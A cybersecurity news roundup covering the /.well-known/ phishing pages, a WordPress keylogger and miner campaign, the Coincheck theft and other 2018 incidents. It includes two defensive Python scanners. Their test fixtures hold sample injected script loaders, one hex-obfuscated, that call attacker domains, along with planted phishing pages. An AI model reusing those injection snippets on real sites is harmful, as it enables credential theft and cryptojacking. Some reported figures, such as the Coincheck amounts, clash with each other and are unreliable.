
Hackers hiding phishing pages in /.well-known/ directories on compromised websites

Phishing pages planted inside a website's /.well-known/ directory have become a convenient technique for attackers compromising websites around the world. Netcraft confirmed this after encountering hundreds of such pages hosted in a /.well-known/ folder. The path is reserved for "well-known URIs" (RFC 5785, since replaced by RFC 8615): a fixed location where a site publishes policy and metadata files that automated clients know to look for.

Its most common use is domain-control validation. When a site owner requests a certificate, the certificate authority asks for a specific file to be placed under /.well-known/ and then fetches it over HTTP to confirm that the requester really controls the domain.

According to Netcraft, the /.well-known/ phishing pages were found on sites that support HTTPS, which is consistent with the directory having been created when the site's certificate was issued.

A phishing page hidden in /.well-known/ is easy to overlook: the folder exists on a great many websites without the administrator ever having created it by hand or looked inside it.

The leading dot in the directory name works in the attacker's favour: names beginning with "." are hidden from a plain ls listing (they appear only with ls -a), so an administrator browsing the web root may never notice the folder. The attackers go a step further and bury the phishing pages in the validation subdirectories themselves, /.well-known/pki-validation/ and /.well-known/acme-challenge/, where a stray file looks like nothing more than leftover certificate paperwork.

How the attackers manage to plant these pages on so many sites is still not fully understood.

The most plausible explanation is shared hosting: when the file permissions on a /.well-known/ directory are too permissive, one customer on the server can write into another customer's web root and upload content to a site they do not own.
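To make the /.well-known/ problem concrete, here is an added audit script (not Netcraft's tooling, and not code from the original post) that walks a web root, looks inside the hidden /.well-known/ tree, and flags any file that does not look like a domain-validation token. The ACME HTTP-01 challenge file under acme-challenge/ and the pki-validation/ file are short plain-text files, whereas a phishing kit drops .php or .html pages full of form markup. The web root layout, file contents and the two planted pages are constructed sample data; the allowed subdirectory names and size limit are the script's own assumptions.

```python
"""Audit a web root's hidden /.well-known/ tree for files that are not
domain-validation tokens. Added example; not Netcraft's tooling."""
import os
import re
import shutil
import tempfile

# Subdirectories that certificate validation legitimately writes into
# (ACME HTTP-01 uses acme-challenge/; Comodo/Sectigo DCV uses pki-validation/).
VALIDATION_SUBDIRS = {"acme-challenge", "pki-validation"}

# A validation token is a short plain-text file. Markup or server-side code
# has no business there, whatever the file extension says.
CODE_EXTENSIONS = {".php", ".phtml", ".html", ".htm", ".js"}
MARKUP_RE = re.compile(rb"<\s*(\?php|html|form|script|iframe|input)\b", re.IGNORECASE)
MAX_TOKEN_BYTES = 512  # assumption: real tokens are far smaller than this


def looks_like_validation_token(data: bytes) -> bool:
    return len(data) <= MAX_TOKEN_BYTES and MARKUP_RE.search(data) is None


def audit_well_known(webroot: str) -> list[dict]:
    """Return one finding per suspicious file under <webroot>/.well-known/."""
    findings = []
    wk = os.path.join(webroot, ".well-known")
    if not os.path.isdir(wk):
        return findings
    # os.walk sees the dot-directory that a plain `ls` would hide.
    for dirpath, _dirnames, filenames in os.walk(wk):
        rel_dir = os.path.relpath(dirpath, wk)
        top = "" if rel_dir == "." else rel_dir.split(os.sep)[0]
        for name in filenames:
            path = os.path.join(dirpath, name)
            reasons = []
            if top and top not in VALIDATION_SUBDIRS:
                reasons.append(f"unexpected subdirectory {top!r}")
            ext = os.path.splitext(name)[1].lower()
            if ext in CODE_EXTENSIONS:
                reasons.append(f"code/markup extension {ext!r}")
            with open(path, "rb") as fh:
                head = fh.read(MAX_TOKEN_BYTES + 1)
            if not looks_like_validation_token(head):
                reasons.append("content is not a plain-text validation token")
            if reasons:
                findings.append({"path": os.path.relpath(path, webroot), "reasons": reasons})
    return findings


def build_sample_webroot() -> str:
    """Constructed fixture: one legitimate ACME token, one legitimate
    pki-validation file, and two planted phishing pages (sample data, not real)."""
    root = tempfile.mkdtemp(prefix="webroot-")
    files = {
        ".well-known/acme-challenge/kDq3ZbPfXo9v1mRsT2uWcE8yHn4jLaG6":
            b"kDq3ZbPfXo9v1mRsT2uWcE8yHn4jLaG6.Qz7vYxB3nM2pLr9wKt5sJd8fGh1cVe4a",
        ".well-known/pki-validation/A1B2C3D4.txt":
            b"d41d8cd98f00b204e9800998ecf8427e\ncomodoca.com\n",
        ".well-known/acme-challenge/login.php":
            b"<?php /* harvests credentials */ ?><html><form action=\"post.php\">",
        ".well-known/pki-validation/secure/index.html":
            b"<html><body><form method=post>Sign in</form></body></html>",
    }
    for rel, data in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return root


def remove_sample_webroot(root: str) -> None:
    shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    root = build_sample_webroot()
    try:
        for finding in audit_well_known(root):
            print(finding["path"], "->", "; ".join(finding["reasons"]))
    finally:
        remove_sample_webroot(root)
```

Point `audit_well_known` at a real document root (for example `/var/www/html` or a cPanel `public_html`) to get the same output for a live site; the only files it should report on a clean host are ones you or your certificate tooling can account for.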

Team8 portfolio company Hysolate comes out of stealth and launches its first product, built on a hybrid architecture

The Israeli cyber security company Hysolate, founded by Tal Zamir, a veteran of an elite Israeli cyber unit and former R&D lead at Wanova, and Dan Dinnar, former CEO of HexaTier and sales executive at CyberArk Software, recently made the news for raising around $8 million in a round led by the cyber security foundry Team8 and Eric Schmidt's Innovation Endeavors.

Against the backdrop of a rising number of cyber threats, the Team8 portfolio company has now come out of stealth and launched its first product.

Enterprises have traditionally responded to these threats by locking down user devices: preventing users from browsing the web freely, installing new applications, connecting USB devices, or working effectively with third parties and cloud services.

In other cases, enterprises adopt an "air gap" security model that requires users to carry two laptops: an unrestricted one for full internet use and a tightly locked-down one for privileged corporate access. This improves security significantly, but at a real cost in productivity, and it is a constant source of frustration for employees.

Hysolate lets enterprises run several operating systems side by side on a single workstation, keeping them isolated from one another while giving end users a seamless experience, and without lowering the level of security. The start-up built its platform on an alternative "hybrid" architecture that it says eliminates these trade-offs.

Zamir said, "While we are proud to introduce Hysolate, what excites us even more is that we are creating game-changing comprehensive security architecture for endpoints. The feedback we have received from our first customers - who include some of the world's most respected and well-known brands - over the last year has been overwhelmingly positive, and we look forward to rapidly expanding our customer and partner base over the next year."

Nadav Zafrir, co-founder and CEO of Team8, agrees: while most enterprise security products put security first and users last, Hysolate is "secure-by-design", with no compromise on either security or user experience. He adds that since its founding the Hysolate team has far exceeded Team8's expectations.

Hysolate is already working with some of the largest enterprises in the world, including several of the world's biggest banks, technology vendors, financial service providers and other enterprise organisations. It is the fourth company to be launched out of Team8, joining Illusive Networks, Claroty and the recently launched Sygnia.


Keylogger campaign infects 2,000 WordPress sites

Security researchers have discovered over 2,000 WordPress sites, possibly more, infected with a keylogger that is loaded on the WordPress login page and a cryptojacking script (an in-browser cryptocurrency miner) on their front ends.

Researchers at Sucuri, who made the discovery, said the recent campaign is tied to the threat actors behind a December 2017 campaign. Both incidents used the same keylogger-and-miner injection, known as cloudflare[.]solutions after the domain that served the malicious scripts in the first campaign.

Cloudflare[.]solutions is in no way related to the network and security firm Cloudflare.
The attack is straightforward. The miscreants find poorly secured WordPress sites, usually ones running older WordPress versions or outdated themes and plugins, and use exploits for those sites to inject malicious code into the CMS.

The injection targets either the WordPress database or the theme's code. "The cdjs[.]online script is injected into either a WordPress database (wp_posts table) or into the theme's functions.php file," Sinegubko wrote.

The injected HTML is obfuscated, and it loads JavaScript with innocuous-looking names, such as a googleanalytics.js file and a startGoogleAnalytics function, from the attackers' domains rather than from Google.

The malicious code has two parts. On the admin login page it loads a keylogger hosted on a third-party domain, capturing credentials as they are typed. On the site's front end it loads the Coinhive in-browser miner and mines Monero using the CPUs of the site's visitors.

"While these new attacks do not yet appear to be as massive as the original cloudflare[.]solutions campaign, the reinfection rate shows that there are still many sites that have failed to properly protect themselves after the original infection," wrote Denis Sinegubko, a senior malware researcher at Sucuri, who authored the research blog post this week.

For the late-2017 campaign, the crooks loaded their keylogger from the cloudflare[.]solutions domain. Those attacks affected nearly 5,500 WordPress sites and were stopped on December 8, when the registrar took down the miscreants' domain.
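A site owner cleaning up after this campaign needs to look in the two places Sucuri names, functions.php and the wp_posts table, and needs to see through the obfuscation, because a hex-escaped `\x3c\x73\x63...` never matches a grep for `<script`. The added example below (my code, not Sucuri's scanner or anything from the original post) undoes JavaScript hex escapes, extracts every remote URL, and reports those that point at the campaign's domains or mimic Google Analytics from an unknown host. The functions.php text and wp_posts rows are constructed sample data modelled on the naming the article describes, and the allow-list of legitimate script hosts is an assumption you would replace with your own site's.

```python
"""Scan a WordPress theme's functions.php and wp_posts rows for injected
remote scripts of the cloudflare[.]solutions / cdjs[.]online kind.
Added example; not Sucuri's scanner."""
import re
from urllib.parse import urlparse

# Domains named in the Sucuri research discussed above.
CAMPAIGN_DOMAINS = {"cloudflare.solutions", "cdjs.online"}
# Assumption: hosts this particular site legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"www.google-analytics.com", "www.googletagmanager.com"}

URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?::\d+)?[^\s\"'<>)]*")
JS_HEX_RE = re.compile(r"\\x([0-9a-fA-F]{2})")


def decode_js_escapes(text: str) -> str:
    """Undo \\xNN escapes so a hidden '<script src=...' becomes visible again."""
    return JS_HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), text)


def scan_source(name: str, text: str) -> list[dict]:
    """Report every remote URL in `text` that looks like a campaign injection."""
    decoded = decode_js_escapes(text)
    findings = []
    for match in URL_RE.finditer(decoded):
        url = match.group(0)
        host = (urlparse(url).hostname or "").lower()
        reasons = []
        if host in CAMPAIGN_DOMAINS:
            reasons.append("known campaign domain")
        if host not in ALLOWED_SCRIPT_HOSTS and "analytics" in url.lower():
            reasons.append("analytics look-alike served from an unknown host")
        if url not in text:
            reasons.append("URL was hidden behind JavaScript hex escapes")
        if reasons:
            findings.append({"source": name, "host": host, "url": url, "reasons": reasons})
    return findings


def scan_site(functions_php: str, wp_posts: list[dict]) -> list[dict]:
    """Scan the theme file plus the post_content of each wp_posts row."""
    findings = scan_source("functions.php", functions_php)
    for row in wp_posts:
        findings += scan_source(f"wp_posts#{row['ID']}", row["post_content"])
    return findings


def _hex_escape(s: str) -> str:
    """Build the kind of \\xNN-obfuscated string the injection uses (for the fixture)."""
    return "".join(f"\\x{b:02x}" for b in s.encode())


# Constructed sample: a normal theme file with one planted hook at the bottom.
SAMPLE_FUNCTIONS_PHP = """<?php
function demo_theme_scripts() {
    wp_enqueue_script('ga', 'https://www.google-analytics.com/analytics.js', [], null, true);
}
add_action('wp_enqueue_scripts', 'demo_theme_scripts');
// --- planted injection (constructed, modelled on the campaign's naming) ---
function startGoogleAnalytics() {
    echo '<script src="https://cloudflare.solutions/ajax/googleanalytics.js"></script>';
}
add_action('wp_head', 'startGoogleAnalytics');
"""

# Constructed sample rows from wp_posts; row 12 carries a hex-escaped loader.
SAMPLE_WP_POSTS = [
    {"ID": 7, "post_content": "<p>Welcome to the site.</p>"},
    {"ID": 12, "post_content": (
        "<p>Latest news.</p><script>var s=document.createElement('script');"
        "s.src=\"" + _hex_escape("https://cdjs.online/googleanalytics.js") + "\";"
        "document.head.appendChild(s);</script>")},
]

if __name__ == "__main__":
    for finding in scan_site(SAMPLE_FUNCTIONS_PHP, SAMPLE_WP_POSTS):
        print(finding["source"], finding["url"], "->", "; ".join(finding["reasons"]))
```

For a live site, feed `scan_site` the contents of `wp-content/themes/<theme>/functions.php` and the rows of `SELECT ID, post_content FROM wp_posts`; anything it reports should be removed, and the WordPress core, theme and plugins updated before the site is put back, otherwise the reinfection Sucuri describes is the likely outcome.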

Japan cryptocurrency exchange to refund stolen assets worth $400m

Coincheck, one of Japan's major cryptocurrency exchanges, has promised to refund its customers about $423m (£282m) stolen by hackers two days ago in one of the biggest thefts of digital funds to date.

The hack occurred on Friday, when the company detected "unauthorised access" to the exchange and suspended trading in all cryptocurrencies apart from bitcoin.

The attackers were able to access the company's NEM coins (XEM), a lesser-known cryptocurrency that is nonetheless the world's 10th largest by market capitalisation. The losses amounted to about $534m (£380m).

The company has said it will reimburse affected customers in cash for close to 90% of the value of their lost coins.

Over 260,000 customers are reported to have been affected by the hack.

According to Coincheck, the hackers were able to steal the NEM coins because they were held in online "hot wallets", whose signing keys sit on internet-connected systems, rather than in offline "cold wallets", whose keys never touch the network and are therefore far harder to steal remotely.

The company says it knows the digital address to which the coins were transferred and believes the assets are recoverable.

Hackers forced US ATMs to spit out cash

Two of the world's largest ATM manufacturers, Diebold Nixdorf Inc and NCR Corp, have warned their US customers that hackers are targeting their machines with tools that force them to dispense cash, an attack known as "jackpotting".

Neither manufacturer has identified any victims or said how much money has been lost so far.

The attacks were first reported on 27 January by the security news website Krebs on Security; the companies sent alerts to their customers on Saturday warning of the trend.

"This should be treated by all ATM deployers as a call to action to take appropriate steps to protect their ATMs against these forms of attack," the alert said.

Jackpotting has been used widely around the world in recent years, but it is still unclear how much cash has been stolen, because victims and police rarely disclose details.

Diebold Nixdorf said that US authorities had warned it that one of its ATM models, the Opteva, which it stopped manufacturing several years ago, was being targeted by the hackers.

Krebs on Security reported that "a confidential US Secret Service alert sent to banks said the hackers targeted stand-alone ATMs typically located in pharmacies and big-box retailers as well as drive-thru ATMs."

The Federal Bureau of Investigation has also begun investigating the matter.

OnePlus denies accusation of sending clipboard data to China

OnePlus has been accused of sending clipboard data from OnePlus phones running the latest OxygenOS beta to China. The company has denied the accusation, saying the code in question is inactive and was created for its Chinese phones only.

The finding was first published on Twitter by the security researcher posting as Elliot Alderson, who explained how the application works.

He posted that the Clipboard app in the OxygenOS beta contained a strange file called badword.txt, along with six others, which could identify what kind of data the user had copied to the clipboard and send sensitive items such as bank details and passwords to a Chinese server, allegedly belonging to a Chinese company called Teddy Mobile.

OnePlus has since denied the accusation and released a statement saying that "there's been a false claim that the Clipboard app has been sending user data to a server. The code is entirely inactive in the open beta for OxygenOS, our global operating system. No user data is being sent to any server without consent in OxygenOS."

It added that the folder in question exists in the open beta of HydrogenOS, its operating system for China only, to filter out which data should not be uploaded; data matching that local list is skipped and not sent to any server.

Japan cryptocurrency exchange loses $532 million to hackers

The Tokyo-based cryptocurrency exchange Coincheck has admitted that hackers stole several hundred million dollars' worth of its holdings.

The company said that about ¥58 billion ($532 million) worth of its NEM coins was transferred to another account at around 3 a.m. local time on January 27, 2018. The news has caused panic among its clients about the safety of their virtual assets.

Company co-founder Yusuke Otsuka said they did not yet know how the roughly 500 million tokens went missing, but that the firm is investigating and working hard to ensure the safety of all client assets.

"We know where the funds were sent," Otsuka said during a press conference at the Tokyo Stock Exchange. "We are tracing them and if we're able to continue tracking, it may be possible to recover them. But it is something we are investigating at the moment."

The firm's NEM balance fell sharply after the illegitimate transfer.

"We are deeply sorry for troubling people with this issue," said Coincheck CEO Koichiro Wada.

Russia-linked hackers Fancy Bears leak data from International Luge Federation

A Russia-linked hacker group calling itself "Fancy Bears" released a statement on Wednesday claiming to have leaked emails and documents that demonstrate violations of anti-doping rules, just two weeks before the 2018 Winter Olympics.

"The obtained documents of the International Luge Federation (FIL) show the violations of the principles of fair play: widespread TUE approvals, missed anti-doping tests and the double standards approach towards guilty athletes," read the statement.

The same group was implicated in the 2016 Democratic National Committee (DNC) hack, and is also known as "Pawn Storm" or "APT28".

The leak is believed to be a response to Russia's ban from the 2018 Winter Olympics. The group is also believed to have been behind the 2016 hack of the World Anti-Doping Agency (WADA), which leaked sensitive athlete data and was itself a response to WADA's recommendation that Russian athletes be banned from the 2016 Rio games over allegations of state-sponsored doping.

The hacking group’s “About Us” on their website reads, “We are going to tell you how Olympic medals are won. We hacked World Anti-Doping Agency databases and we were shocked with what we saw.”

Google Chrome 64 update fixes 53 security bugs

Google has released Chrome 64, and the stable build is available for Windows, Mac and Linux users.

The new release improves the video experience and adds mitigations against the Meltdown and Spectre speculative-execution attacks.

One of the most important new features is the ability to mute entire websites, where earlier versions let you mute only individual tabs. Users can now permanently silence sites that autoplay videos.

The blog post says, "We would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel."

The update includes 53 security fixes. It also brings High Dynamic Range (HDR) video support to PCs running the latest version of Windows 10 with an HDR-compatible monitor.

Google has begun rolling out the update on all three platforms, and users who do not yet have it will be able to download it soon.

Official app stores targeted by malicious Bitcoin apps that steal money and personal data

Hackers are targeting users of Apple's App Store, Google Play, SameAPK, APKPlz and other app stores with malicious cryptocurrency apps designed to steal money and personal data.

RiskIQ, a cyber security company based in San Francisco, analysed 18,408 apps across 20 app stores, including Apple's App Store and Google Play, to identify those blacklisted by security vendors. It found 661 blacklisted Bitcoin-themed apps available for users to download.

With 272 apps, Google Play hosted the largest number of malicious cryptocurrency apps.

"We are seeing threat actors around the world exploiting what is already a hostile currency in a lawless digital world," said Fabian Libeau, EMEA vice-president of RiskIQ.

"Before handing over any cash or personal data, investors should carry out thorough research into the exchange and wallet apps they intend to use. By checking the developer's name, user reviews and the number of app downloads, investors can measure the validity of an app and be more confident in their choice."

According to the report, the hackers use app names containing phrases such as "bitcoin exchange", "bitcoin wallet" and "cryptocurrency" to lure potential victims.

Power grids facing cyber security threats

Cyber security experts have identified yet another serious malware threat to power grid systems, prompting the authority to recommend an effective mechanism for dealing with the danger across the entire sector.

The threat is the WannaCry ransomware worm, which has become a new way for attackers to target the information networks of power distributors. Ukraine's power distributors have already been hit by grid cyber attacks: an attack in December 2016 disrupted power distribution in the capital, Kiev, showing that even a limited intrusion can cause an outage.

In May 2017 WannaCry spread to computers and networks in more than 100 countries, including India, which prompted a worried power ministry to set up a panel of experts within the Central Electricity Authority (CEA) to devise a mechanism for countering the threat.

The CEA panel submitted its findings in July 2017, warning that more such attacks are likely because the networks used to distribute electricity to consumers are, beyond doubt, vulnerable to hackers.

The experts also warn of computer worms that could permanently disable smart meters by spreading through the advanced metering infrastructure (AMI).

The findings note the lack of a technical standard for cyber security in smart grid systems, and recommend that the authority set up a mechanism for sharing information on cyber security incidents.

The CEA experts add that, unlike most other operational problems, cyber threats cannot be reliably predicted.